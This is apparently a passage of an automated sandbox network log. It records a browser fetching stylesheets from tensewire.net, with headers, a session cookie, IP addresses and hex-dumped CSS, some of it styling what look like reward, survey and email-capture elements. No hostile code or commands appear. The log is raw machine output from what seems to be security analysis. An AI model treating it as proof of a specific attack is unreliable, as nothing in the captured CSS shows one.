                              Data Ascii: me 6 Pro"}.fab,.fa-brands{font-family:"Font Awesome 6 Brands"}.fad,.fa-classic.fa-duotone,.fa-duotone{font-family:"Font Awesome 6 Duotone"}.fass,.fasr,.fasl,.fa-sharp{font-family:"Font Awesome 6 Sharp"}.fass,.fa-sharp{font-weight:900}.fa-1x{font-size:1em}
                              2024-04-25 18:22:13 UTC1369INData Raw: 6c 65 66 74 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 76 61 72 28 2d 2d 66 61 2d 70 75 6c 6c 2d 6d 61 72 67 69 6e 2c 2e 33 65 6d 29 7d 2e 66 61 2d 70 75 6c 6c 2d 72 69 67 68 74 7b 66 6c 6f 61 74 3a 72 69 67 68 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 76 61 72 28 2d 2d 66 61 2d 70 75 6c 6c 2d 6d 61 72 67 69 6e 2c 2e 33 65 6d 29 7d 2e 66 61 2d 62 65 61 74 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 66 61 2d 62 65 61 74 3b 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 66 61 2d 62 65 61 74 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 2c 30 73 29 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 76 61 72 28
                              Data Ascii: left;margin-right:var(--fa-pull-margin,.3em)}.fa-pull-right{float:right;margin-left:var(--fa-pull-margin,.3em)}.fa-beat{-webkit-animation-name:fa-beat;animation-name:fa-beat;-webkit-animation-delay:var(--fa-animation-delay,0s);-webkit-animation-delay:var(
                              2024-04-25 18:22:13 UTC1369INData Raw: 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 69 72 65 63 74 69 6f 6e 2c 6e 6f 72 6d 61 6c 29 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 69 72 65 63 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 69 72 65 63 74 69 6f 6e 2c 6e 6f 72 6d 61 6c 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 69 72 65 63 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 69 72 65 63 74 69 6f 6e 2c 6e 6f 72 6d 61 6c 29 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 2c 31 73 29 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61
                              Data Ascii: var(--fa-animation-direction,normal);-webkit-animation-direction:var(--fa-animation-direction,normal);animation-direction:var(--fa-animation-direction,normal);-webkit-animation-duration:var(--fa-animation-duration,1s);-webkit-animation-duration:var(--fa-a
                              2024-04-25 18:22:13 UTC1369INData Raw: 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 2c 31 73 29 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 2c 69 6e 66 69 6e 69 74 65 29 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 2c 69 6e 66 69 6e 69 74 65 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 2c 69 6e 66 69 6e 69 74 65 29 3b 2d 77 65 62 6b 69 74 2d 61
                              Data Ascii: ion-duration,1s);-webkit-animation-iteration-count:var(--fa-animation-iteration-count,infinite);-webkit-animation-iteration-count:var(--fa-animation-iteration-count,infinite);animation-iteration-count:var(--fa-animation-iteration-count,infinite);-webkit-a
                              2024-04-25 18:22:13 UTC1369INData Raw: 62 69 63 2d 62 65 7a 69 65 72 28 2e 34 2c 30 2c 2e 36 2c 31 29 29 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2c 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 34 2c 30 2c 2e 36 2c 31 29 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2c 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 34 2c 30 2c 2e 36 2c 31 29 29 7d 2e 66 61 2d 66 6c 69 70 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 66 61 2d 66 6c 69 70 3b 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 66 61 2d 66 6c 69 70 3b 2d 77 65 62 6b 69 74
                              Data Ascii: bic-bezier(.4,0,.6,1));-webkit-animation-timing-function:var(--fa-animation-timing,cubic-bezier(.4,0,.6,1));animation-timing-function:var(--fa-animation-timing,cubic-bezier(.4,0,.6,1))}.fa-flip{-webkit-animation-name:fa-flip;animation-name:fa-flip;-webkit
                              2024-04-25 18:22:13 UTC1369INData Raw: 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 2c 30 73 29 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 69 72 65 63 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 69 72 65 63 74 69 6f 6e 2c 6e 6f 72 6d 61 6c 29 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 69 72 65 63 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 69 72 65 63 74 69 6f 6e 2c 6e 6f 72 6d 61 6c 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 69 72 65 63 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 69 72 65 63 74 69 6f 6e 2c 6e 6f 72 6d 61 6c 29 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f
                              Data Ascii: imation-delay:var(--fa-animation-delay,0s);-webkit-animation-direction:var(--fa-animation-direction,normal);-webkit-animation-direction:var(--fa-animation-direction,normal);animation-direction:var(--fa-animation-direction,normal);-webkit-animation-duratio
                              2024-04-25 18:22:13 UTC1369INData Raw: 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 2c 32 73 29 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 2c 69 6e 66 69 6e 69 74 65 29 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 2c 69 6e 66 69 6e 69 74 65 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 2c 69 6e 66 69 6e 69 74 65 29 3b 2d
                              Data Ascii: a-animation-duration,2s);-webkit-animation-iteration-count:var(--fa-animation-iteration-count,infinite);-webkit-animation-iteration-count:var(--fa-animation-iteration-count,infinite);animation-iteration-count:var(--fa-animation-iteration-count,infinite);-
                              2024-04-25 18:22:13 UTC1369INData Raw: 64 69 61 20 28 70 72 65 66 65 72 73 2d 72 65 64 75 63 65 64 2d 6d 6f 74 69 6f 6e 3a 72 65 64 75 63 65 29 7b 2e 66 61 2d 62 65 61 74 2c 2e 66 61 2d 62 6f 75 6e 63 65 2c 2e 66 61 2d 66 61 64 65 2c 2e 66 61 2d 62 65 61 74 2d 66 61 64 65 2c 2e 66 61 2d 66 6c 69 70 2c 2e 66 61 2d 70 75 6c 73 65 2c 2e 66 61 2d 73 68 61 6b 65 2c 2e 66 61 2d 73 70 69 6e 2c 2e 66 61 2d 73 70 69 6e 2d 70 75 6c 73 65 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 69 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 30 73 3b 74 72 61 6e 73 69 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 30 73 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 69 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 73 3b 74 72 61 6e 73 69 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 73 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72
                              Data Ascii: dia (prefers-reduced-motion:reduce){.fa-beat,.fa-bounce,.fa-fade,.fa-beat-fade,.fa-flip,.fa-pulse,.fa-shake,.fa-spin,.fa-spin-pulse{-webkit-transition-duration:0s;transition-duration:0s;-webkit-transition-delay:0s;transition-delay:0s;-webkit-animation-dur
                              2024-04-25 18:22:13 UTC1369INData Raw: 61 6e 73 6c 61 74 65 59 28 76 61 72 28 2d 2d 66 61 2d 62 6f 75 6e 63 65 2d 68 65 69 67 68 74 2c 2d 2e 35 65 6d 29 29 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 76 61 72 28 2d 2d 66 61 2d 62 6f 75 6e 63 65 2d 6a 75 6d 70 2d 73 63 61 6c 65 2d 78 2c 2e 39 29 2c 76 61 72 28 2d 2d 66 61 2d 62 6f 75 6e 63 65 2d 6a 75 6d 70 2d 73 63 61 6c 65 2d 79 2c 31 2e 31 29 29 74 72 61 6e 73 6c 61 74 65 59 28 76 61 72 28 2d 2d 66 61 2d 62 6f 75 6e 63 65 2d 68 65 69 67 68 74 2c 2d 2e 35 65 6d 29 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 76 61 72 28 2d 2d 66 61 2d 62 6f 75 6e 63 65 2d 6a 75 6d 70 2d 73 63 61 6c 65 2d 78 2c 2e 39 29 2c 76 61 72 28 2d 2d 66 61 2d 62 6f 75 6e 63 65 2d 6a 75 6d 70 2d 73 63 61 6c 65 2d 79 2c 31 2e 31 29
                              Data Ascii: anslateY(var(--fa-bounce-height,-.5em));-webkit-transform:scale(var(--fa-bounce-jump-scale-x,.9),var(--fa-bounce-jump-scale-y,1.1))translateY(var(--fa-bounce-height,-.5em));transform:scale(var(--fa-bounce-jump-scale-x,.9),var(--fa-bounce-jump-scale-y,1.1)


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              9192.168.2.449746104.21.47.804435468C:\Program Files\Google\Chrome\Application\chrome.exe
                              TimestampBytes transferredDirectionData
                              2024-04-25 18:22:12 UTC684OUTGET /assets/css/dublin/dist/common-hybrid.css?v=454576b4f6c63244067eabf05b8f71b6 HTTP/1.1
                              Host: tensewire.net
                              Connection: keep-alive
                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                              sec-ch-ua-mobile: ?0
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                              sec-ch-ua-platform: "Windows"
                              Accept: text/css,*/*;q=0.1
                              Sec-Fetch-Site: same-origin
                              Sec-Fetch-Mode: no-cors
                              Sec-Fetch-Dest: style
                              Referer: https://tensewire.net/3a36ef2959e87b2ca27c8f04b726a343
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en;q=0.9
                              Cookie: PHPSESSID=ee22049cb2431a7edf3dbdfcc8e5d0ef
                              2024-04-25 18:22:13 UTC814INHTTP/1.1 200 OK
                              Date: Thu, 25 Apr 2024 18:22:13 GMT
                              Content-Type: text/css
                              Transfer-Encoding: chunked
                              Connection: close
                              Cache-Control: public, max-age=604800
                              expires: Thu, 02 May 2024 18:22:13 GMT
                              last-modified: Tue, 02 Apr 2024 18:42:41 GMT
                              vary: Accept-Encoding,User-Agent,User-Agent
                              x-frame-options: SAMEORIGIN
                              x-xss-protection: 1; mode=block
                              x-content-type-options: nosniff
                              alt-svc: h3=":443"; ma=86400
                              CF-Cache-Status: MISS
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GeoVnPnWbcm9yDzfXn3JxCqN6%2BR3NHRbSohqtMEMVg6%2BAmwobXb0VKlvPNe33USbsTtHyT0MU5BmVMvFJaGJyIQJzU1K1y1MqJSVGV90kbx9Uklr2pV0%2B5UN27hz4yaN"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 87a05b73beecb0b8-ATL
                              2024-04-25 18:22:13 UTC555INData Raw: 37 62 64 30 0d 0a 69 6e 70 75 74 3a 3a 2d 77 65 62 6b 69 74 2d 69 6e 6e 65 72 2d 73 70 69 6e 2d 62 75 74 74 6f 6e 2c 69 6e 70 75 74 3a 3a 2d 77 65 62 6b 69 74 2d 6f 75 74 65 72 2d 73 70 69 6e 2d 62 75 74 74 6f 6e 7b 2d 77 65 62 6b 69 74 2d 61 70 70 65 61 72 61 6e 63 65 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 3a 30 7d 69 6e 70 75 74 3a 2d 77 65 62 6b 69 74 2d 61 75 74 6f 66 69 6c 6c 2c 73 65 6c 65 63 74 3a 2d 77 65 62 6b 69 74 2d 61 75 74 6f 66 69 6c 6c 7b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 20 35 30 30 30 73 20 65 61 73 65 2d 69 6e 2d 6f 75 74 20 30 73 7d 2e 73 61 5f 6c 69 6e 65 5f 6c 65 66 74 2c 2e 73 61 5f 6c 69 6e 65 5f 72 69 67 68 74 7b 77 69 64 74 68 3a 32 35 70 78 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65
                              Data Ascii: 7bd0input::-webkit-inner-spin-button,input::-webkit-outer-spin-button{-webkit-appearance:none;margin:0}input:-webkit-autofill,select:-webkit-autofill{transition:background-color 5000s ease-in-out 0s}.sa_line_left,.sa_line_right{width:25px;display:inline
                              2024-04-25 18:22:13 UTC1369INData Raw: 6e 64 61 72 64 20 23 61 64 76 45 6d 61 69 6c 53 75 62 2c 23 71 75 65 73 74 69 6f 6e 42 6f 64 79 20 23 65 6d 61 69 6c 2d 64 61 74 61 2d 62 74 6e 55 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 6c 65 66 74 2d 72 61 64 69 75 73 3a 30 21 69 6d 70 6f 72 74 61 6e 74 3b 62 6f 72 64 65 72 2d 74 6f 70 2d 6c 65 66 74 2d 72 61 64 69 75 73 3a 30 21 69 6d 70 6f 72 74 61 6e 74 7d 23 61 64 76 45 6d 61 69 6c 53 74 61 6e 64 61 72 64 20 23 61 64 76 45 6d 61 69 6c 49 6e 70 75 74 2c 23 71 75 65 73 74 69 6f 6e 42 6f 64 79 20 23 65 6d 61 69 6c 2d 64 61 74 61 55 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 72 69 67 68 74 2d 72 61 64 69 75 73 3a 30 21 69 6d 70 6f 72 74 61 6e 74 3b 62 6f 72 64 65 72 2d 74 6f 70 2d 72 69 67 68 74 2d 72 61 64 69 75 73 3a 30 21 69 6d 70 6f 72 74 61
                              Data Ascii: ndard #advEmailSub,#questionBody #email-data-btnU{border-bottom-left-radius:0!important;border-top-left-radius:0!important}#advEmailStandard #advEmailInput,#questionBody #email-dataU{border-bottom-right-radius:0!important;border-top-right-radius:0!importa
                              2024-04-25 18:22:13 UTC1369INData Raw: 6e 74 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 66 6f 6e 74 2d 73 69 7a 65 3a 30 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 30 29 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 2d 38 70 78 3b 62 6f 74 74 6f 6d 3a 2d 31 30 70 78 7d 2e 6d 65 73 73 61 67 65 20 2e 6c 6f 67 6f 5f 62 67 5f 69 6e 6c 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 33 30 70 78 7d 2e 6d 62 61 64 76 32 20 73 76 67 7b 77 69 64 74 68 3a 35 30 70 78 3b 68 65 69 67 68 74 3a 35 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 35 70 78 7d 2e 6d 62 61 64 76 32 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 32 66 32 66 32 7d 2e 6d 62 61 64 76 32 20 23 61 64 76 45 6d 61 69 6c 53 74 61 6e 64 61 72 64 20 23 61 64 76 45 6d 61 69 6c 53 75 62 7b 62 6f 72 64
                              Data Ascii: nt transparent;font-size:0;transform:rotate(0);position:absolute;left:-8px;bottom:-10px}.message .logo_bg_inl{margin-top:-30px}.mbadv2 svg{width:50px;height:50px;margin-top:-15px}.mbadv2{background-color:#f2f2f2}.mbadv2 #advEmailStandard #advEmailSub{bord
                              2024-04-25 18:22:13 UTC1369INData Raw: 69 6c 5f 70 6f 70 75 70 20 2e 69 6e 70 75 74 5f 61 6c 6f 6e 65 20 69 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 23 6d 6f 64 61 6c 5f 65 6d 61 69 6c 20 23 65 6d 61 69 6c 2d 64 61 74 61 2d 62 74 6e 55 2c 23 6d 6f 64 61 6c 5f 65 6d 61 69 6c 5f 70 6f 70 75 70 20 23 61 64 76 45 6d 61 69 6c 53 75 62 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 33 30 70 78 3b 72 69 67 68 74 3a 38 70 78 3b 74 6f 70 3a 38 70 78 3b 68 65 69 67 68 74 3a 35 35 70 78 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 7d 23 6d 6f 64 61 6c 5f 65 6d 61 69 6c 20 2e 6d 6f 64 61 6c 2d 66 6f 6f 74 65 72 2c 23 6d 6f 64 61 6c 5f 65 6d 61 69 6c 5f 70 6f 70 75 70 20 2e 6d 6f 64 61 6c 2d 66 6f 6f 74 65 72 7b 62
                              Data Ascii: il_popup .input_alone i{display:none}#modal_email #email-data-btnU,#modal_email_popup #advEmailSub{position:absolute;border-radius:30px;right:8px;top:8px;height:55px;border:none;box-shadow:none}#modal_email .modal-footer,#modal_email_popup .modal-footer{b
                              2024-04-25 18:22:13 UTC1369INData Raw: 36 34 70 78 3b 6d 61 72 67 69 6e 3a 38 70 78 3b 62 6f 72 64 65 72 3a 38 70 78 20 73 6f 6c 69 64 20 23 66 66 66 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 30 25 3b 61 6e 69 6d 61 74 69 6f 6e 3a 6c 64 73 2d 72 69 6e 67 20 31 2e 32 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 35 2c 30 2c 2e 35 2c 31 29 20 69 6e 66 69 6e 69 74 65 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 66 66 66 20 74 72 61 6e 73 70 61 72 65 6e 74 20 74 72 61 6e 73 70 61 72 65 6e 74 20 74 72 61 6e 73 70 61 72 65 6e 74 7d 2e 6c 64 73 2d 72 69 6e 67 20 64 69 76 3a 66 69 72 73 74 2d 63 68 69 6c 64 7b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 2d 2e 34 35 73 7d 2e 6c 64 73 2d 72 69 6e 67 20 64 69 76 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 7b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c
                              Data Ascii: 64px;margin:8px;border:8px solid #fff;border-radius:50%;animation:lds-ring 1.2s cubic-bezier(.5,0,.5,1) infinite;border-color:#fff transparent transparent transparent}.lds-ring div:first-child{animation-delay:-.45s}.lds-ring div:nth-child(2){animation-del
                              2024-04-25 18:22:13 UTC1369INData Raw: 66 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 33 30 70 78 3b 70 61 64 64 69 6e 67 3a 36 70 78 3b 6f 70 61 63 69 74 79 3a 2e 38 7d 2e 6c 6f 67 6f 5f 64 75 62 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 63 6f 6e 67 72 61 74 73 5f 64 75 62 7b 66 6f 6e 74 2d 73 69 7a 65 3a 35 35 70 78 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 6d 6f 6e 74 7d 2e 6c 6f 67 6f 5f 64 75 62 20 69 6d 67 7b 6d 61 78 2d 77 69 64 74 68 3a 32 35 30 70 78 7d 2e 63 6f 6e 74 69 6e 75 65 2e 72 64 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 6c 65 66 74 2d 72 61 64 69 75 73 3a 31 35 70 78 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 72 69 67 68 74 2d 72 61 64 69 75 73 3a 31 35 70 78 3b 70 61 64 64
                              Data Ascii: f;border-radius:30px;padding:6px;opacity:.8}.logo_dub{text-align:center;width:100%}.congrats_dub{font-size:55px;font-family:mont}.logo_dub img{max-width:250px}.continue.rd{border-radius:0;border-bottom-left-radius:15px;border-bottom-right-radius:15px;padd
                              2024-04-25 18:22:13 UTC1369INData Raw: 3b 66 6f 6e 74 2d 73 69 7a 65 3a 33 35 70 78 21 69 6d 70 6f 72 74 61 6e 74 3b 74 65 78 74 2d 73 68 61 64 6f 77 3a 32 70 78 20 33 70 78 20 34 70 78 20 23 61 39 61 39 61 39 7d 2e 63 6f 6e 67 72 61 74 73 74 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 32 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 78 2d 77 69 64 74 68 3a 38 34 30 70 78 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6d 65 73 73 61 67 65 7b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 33 30 70 78 7d 2e 72 65 77 61 72 64 2d 73 6d 61 6c 6c 2d 63 69 72 63 6c 65 7b 62 6f 72 64 65 72 3a 32 70 78 20 73 6f 6c 69 64 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 30 25 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 62 61 63 6b 67 72 6f 75 6e
                              Data Ascii: ;font-size:35px!important;text-shadow:2px 3px 4px #a9a9a9}.congratst{display:none}.content{margin-top:12px}.container{max-width:840px!important}.message{padding-right:30px}.reward-small-circle{border:2px solid;border-radius:50%;position:absolute;backgroun
                              2024-04-25 18:22:13 UTC1369INData Raw: 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 2e 39 29 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 68 65 61 72 74 62 65 61 74 43 61 72 64 7b 30 25 7b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 2e 39 29 20 72 6f 74 61 74 65 28 35 64 65 67 29 7d 35 30 25 7b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 20 72 6f 74 61 74 65 28 35 64 65 67 29 7d 31 30 30 25 7b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 2e 39 29 20 72 6f 74 61 74 65 28 35 64 65 67 29 7d 7d 2e 70 72 6f 6d 6f 7b 66 6f 6e 74 2d 73 69 7a 65 3a 37 35 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 2e 63 75 72 72 65 6e 63 79 7b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 74 6f 70 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 74 6f 70 3a 31 33 70 78 3b 6c 65 66 74 3a 2d 32
                              Data Ascii: nsform:scale(.9)}}@keyframes heartbeatCard{0%{transform:scale(.9) rotate(5deg)}50%{transform:scale(1) rotate(5deg)}100%{transform:scale(.9) rotate(5deg)}}.promo{font-size:75px;font-weight:700}.currency{vertical-align:top;position:relative;top:13px;left:-2
                              2024-04-25 18:22:13 UTC1369INData Raw: 63 6c 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 66 65 32 31 66 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 61 6c 6c 20 2e 38 73 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 33 29 7d 23 71 75 65 73 74 69 6f 6e 54 65 6d 70 6c 61 74 65 7b 77 69 64 74 68 3a 37 35 25 3b 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 7d 2e 73 75 72 76 65 79 5f 62 75 74 74 6f 6e 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 30 70 78 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 77 69 64 74 68 3a 31 30 30 25 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 31 30 70 78 7d 62 75 74 74 6f 6e 7b 62 6f 72 64 65 72 3a 6e 6f 6e 65 7d 62 75 74 74 6f 6e 3a 66 6f 63 75 73 7b 6f 75 74 6c 69 6e 65 3a
                              Data Ascii: cle{background-color:#0fe21f;transition:all .8s;transform:scale(3)}#questionTemplate{width:75%;margin:0 auto}.survey_button{margin-bottom:10px;display:block;width:100%;padding:10px;cursor:pointer;border-radius:10px}button{border:none}button:focus{outline:
                              2024-04-25 18:22:13 UTC1369INData Raw: 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 2e 64 65 73 63 5f 74 78 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 33 66 33 66 35 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 31 34 70 78 7d 2e 69 6d 67 2d 63 6f 6c 7b 66 6c 6f 61 74 3a 6c 65 66 74 3b 77 69 64 74 68 3a 35 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 7d 2e 76 69 63 6f 6e 7b 77 69 64 74 68 3a 31 36 70 78 3b 6d 61 72 67 69 6e 3a 37 70 78 7d 2e 76 74 65 78 74 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 70 78 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 69 74 61 6c 69 63 3b 63 6f 6c 6f 72 3a 23 33 38 62 64 33 36 7d 2e 72 61 74 69 6e 67 2d 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 30 70 78 7d 2e 64 65 73 63 72 69 70 74 69 6f 6e 7b 6d 61 72 67 69 6e 2d 74 6f 70
                              Data Ascii: rflow:hidden}.desc_tx{background-color:#f3f3f5;border-radius:14px}.img-col{float:left;width:50px;margin-top:5px}.vicon{width:16px;margin:7px}.vtext{font-size:10px;font-style:italic;color:#38bd36}.rating-container{margin-bottom:10px}.description{margin-top


